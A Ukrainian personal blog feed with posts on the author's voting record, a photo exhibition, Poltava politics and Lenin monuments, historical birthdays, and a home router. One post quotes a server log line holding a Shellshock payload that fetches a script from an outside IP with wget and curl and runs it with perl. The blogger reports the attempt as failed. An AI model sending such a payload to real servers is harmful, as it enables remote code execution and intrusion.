На цій весе­лій ноті давай­те при­га­да­є­мо, за кого я голо­су­вав на вибо­рах.

2007‑й рік. Мені 18, насту­пно­го дня пар­ла­мент­ські вибо­ри. Від­даю свій голос за БЮТ.

2008‑й рік. Вибо­ри мера Киє­ва. Голо­сую за Тур­чи­но­ва.

2010‑й рік. Пре­зи­дент­ські вибо­ри. В обох турах не під­три­мую жодно­го кан­ди­да­та.

2010‑й рік. Місце­ві вибо­ри. Пропу­стив.

2012‑й рік. Пар­ла­мент­ські вибо­ри. Голо­сую за КПУ по пар­тій­но­му спи­ску і за пред­став­ни­ка Інтер­нет-пар­тії по мажо­ри­тар­ці.

2014‑й рік. Поза­чер­го­ві пре­зи­дент­ські вибо­ри. Під­три­мую Гри­цен­ка.

2014‑й рік. Поза­чер­го­ві пар­ла­мент­ські вибо­ри. Від­дав свій голос за «Само­по­міч» по пар­тій­но­му спи­ску і за Слав­го­род­сько­го по мажо­ри­тар­ці (149‑й округ).

Мітки:

…на ніч.

Мітки: ,

У субо­ту мав честь від­ві­да­ти тра­ди­цій­ну щорі­чну вистав­ку репор­та­жної фото­гра­фії, яку орга­ні­зо­вує газе­та «День».

Фото­гра­фії, як і зав­жди, на висо­ті, і, зві­сно, цьо­го­рі­чна пере­ва­жна тема­ти­ка оче­ви­дна, але дуже пора­ду­ва­ло те, що нею на вистав­ці не обме­жи­ли­ся.

Зно­ву ж таки тра­ди­цій­но зали­шив від­гук у спе­ці­аль­ній кни­зі та про­го­ло­су­вав за фото­гра­фію, на якій хаси­ди роблять чоти­ри­кра­тний фей­спалм під час моли­тви в Ума­ні.

Вистав­ка пра­цює до 27 числа вклю­чно, щоден­но з 10 до 20. Роз­та­шо­ву­є­ться там же, де й мину­ло­го року — у гале­реї мистецтв «Лав­ра».

Ідіть. Не пожал­ку­є­те.

Мітки: ,

Пре­зи­дент звіль­нив п’ять голів рай­держ­адмі­ні­стра­цій.

У Пол­тав­ській обла­сті з поса­ди голо­ви Ново­сан­жар­ської райа­дмі­ні­стра­ції звіль­не­ний Воло­ди­мир Пар­шев­люк…

АХАХАХАХА, ой, тоб­то, мяу.

Мітки:

Ну, ви ж зна­є­те, як я до цьо­го став­лю­ся. Хто не знає, тому можу попу­ляр­но поясни­ти осо­би­сто.

Але Укр­прав­да пише:

Най­біль­ше пам'яток зали­ши­ло­ся в райо­нах: Гло­бин­сько­му — 11, Кре­мен­чу­цько­му та Семе­нів­сько­му — по 8, Мир­го­род­сько­му, Ново­сан­жар­сько­му, Хороль­сько­му — по 7.

ОК, фіг із ними із Сан­жа­ра­ми. Можна при­ко­лу­па­ти­ся, що їх тата­ри засну­ва­ли. Після при­зна­че­н­ня Пар­шев­лю­ка на поса­ду голо­ви РДА, а Гени Супру­на — голо­вою рай­ра­ди, я вже нічо­му не диву­ю­ся. Але чита­є­мо далі:

Жоден пам'ятник не демон­то­ва­ний в Козель­щин­сько­му, Лубен­сько­му, Чор­ну­хин­сько­му райо­нах і в місті Ком­со­моль­ську.

Нага­дую, що:

На Пол­тав­щи­ні до річни­ці Голо­до­мо­ру, до 24 листо­па­да, пла­ну­ють демон­ту­ва­ти всі пам'ятники Лені­ну.

Ви уяв­ля­є­те — зне­сти пам’ятник у місті, яке і з’явилося-то тіль­ки зав­дя­ки тому, чий пам’ятник зби­ра­ю­ться зне­сти? Ком­со­моль­ча­ни і я, як один із них, зав­жди май­же одно­го­ло­сно були про­ти тако­го сва­ві­л­ля, і цьо­го разу, я спо­ді­ва­ю­ся, також нічо­го не вийде на хви­лі гане­бно­го вар­вар­ства.

Мітки: ,

106 до н. э. — Гней Пом­пей Вели­кий (ум. 48 до н. э.), рим­ский вое­на­чаль­ник и нео­дно­кра­тный кон­сул респу­бли­ки.
1547 — Мигель де Сер­ван­тес Саа­ве­дра (ум. 1616), испан­ский писа­тель.
1571 — Мике­лан­дже­ло Кара­ва­джо (ум. 1610), ита­льян­ский живо­пи­сец, осно­во­по­ло­жник евро­пей­ской реа­ли­сти­че­ской живо­пи­си («Каю­ща­я­ся Мария Магда­ли­на», «Лютнист», «Отдых на пути в Еги­пет»).
1795 — Кон­дра­тий Фёдо­ро­вич Рыле­ев, рус­ский поэт, обще­ствен­ный дея­тель, дека­брист (казнён 1826).
1817 — Але­ксандр Васи­лье­вич Сухо­во-Кобылин (ум. 1903), рус­ский дра­ма­тург, писа­тель.
1843 — Михаил Дми­три­е­вич Ско­бе­лев, рус­ский вое­на­чаль­ник (ум. 1882).
1845 — Иван Кар­пен­ко-Карый (насто­я­щая фами­лия Тоби­ле­вич; ум. 1907), украин­ский писа­тель («Най­ми­чка», «Беста­лан­ная»).
1866 — Михаил Сер­ге­е­вич Гру­шев­ский (ум. 1934), украин­ский исто­рик, пред­се­да­тель Цен­траль­ной Рады («Исто­рия Украи­ны-Руси»).
1901 ― Энри­ко Фер­ми, ита­льян­ский физик, лау­ре­ат Нобе­лев­ской пре­мии по физи­ке 1938 года (ум. 1954).
1904 — Нико­лай Але­ксе­е­вич Остров­ский (ум. 1936), совет­ский писа­тель («Как зака­ля­лась сталь», «Рождён­ные бурей»).
1936 — Силь­вио Бер­лу­ско­ни, ита­льян­ский поли­тик, три­жды быв­ший Пред­се­да­те­лем Сове­та мини­стров Ита­лии (1994—1995, 2001—2006, 2008—2011), пред­при­ни­ма­тель.
1943 — Лех Вален­са, поль­ский поли­ти­че­ский дея­тель, лау­ре­ат Нобе­лев­ской пре­мии мира 1983 года, пре­зи­дент Поль­ши (1990—1995 гг.).
1976 — Андрей Шев­чен­ко, украин­ский фут­бо­лист, обла­да­тель при­за «Золо­той мяч» за 2004 год, вру­ча­е­мо­го лучше­му фут­бо­ли­сту Евро­пы по ито­гам года, капи­тан сбор­ной Украи­ны.

Мітки:

Гре­пнув тут логи.

root@sinclair /srv/http/nginx # zgrep '/bin/bash' */logs/nginx-access.log.*.gz
natalenko.name/logs/nginx-access.log.4.gz:109.202.102.224 - - [25/Sep/2014:19:36:34 +0300] "GET /cgi-bin/hello HTTP/1.0" 404 641 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22"

Ку-ку :).

Насправ­ді, я доста­тньо розум­ний для того, щоб вча­сно ста­ви­ти апдей­ти без­пе­ки, вико­ри­сто­ву­ва­ти nginx і пере­ві­ря­ти наяв­ність фай­лів перед їх пере­да­чею в fastcgi. І тому задум зло­го хакі­ра про­ва­лив­ся.

Мітки:

Роз­мо­ва з ака­де­мі­ком НАН Укра­ї­ни, пое­том Бори­сом Олій­ни­ком про куль­ту­ру Укра­ї­ни на зла­мі сто­літь, тися­чо­літь. У чоти­рьох части­нах.
Read More »

Мітки: ,

Having my brand new hand-crafted home router (Athlon 5150-based, does routing and keeps several remote GUI apps, 3.16 kernel series), I've decided to replace stock Ubuntu 14.04 kernel with pf-kernel and to find out how this can change CPU munin charts.
Read More »

Мітки: ,

Я тебе зно­ву зустрів у сво­їх снах.

Тіль­ки цьо­го разу ти, зав­жди весе­лий згу­сток щастя, про­сто сиді­ла в інва­лі­дно­му віз­ку, про­сто диви­ла­ся пусти­ми очи­ма на мене і про­сто каза­ла, що жити тобі зали­ши­ло­ся всьо­го кіль­ка міся­ців. Отак про­сто.

Від роз­па­чу я був гото­вий кри­ча­ти, але про­ки­нув­ся.

Може, тобі зате­ле­фо­ну­ва­ти. У тебе все нор­маль­но, га?

А ще остан­нім часом сни­ться, що я спі­зню­ю­ся на поїзд. Але сон обри­ва­є­ться й не пока­зує, що ста­є­ться потім, коли поїзд уже пішов.

Мітки: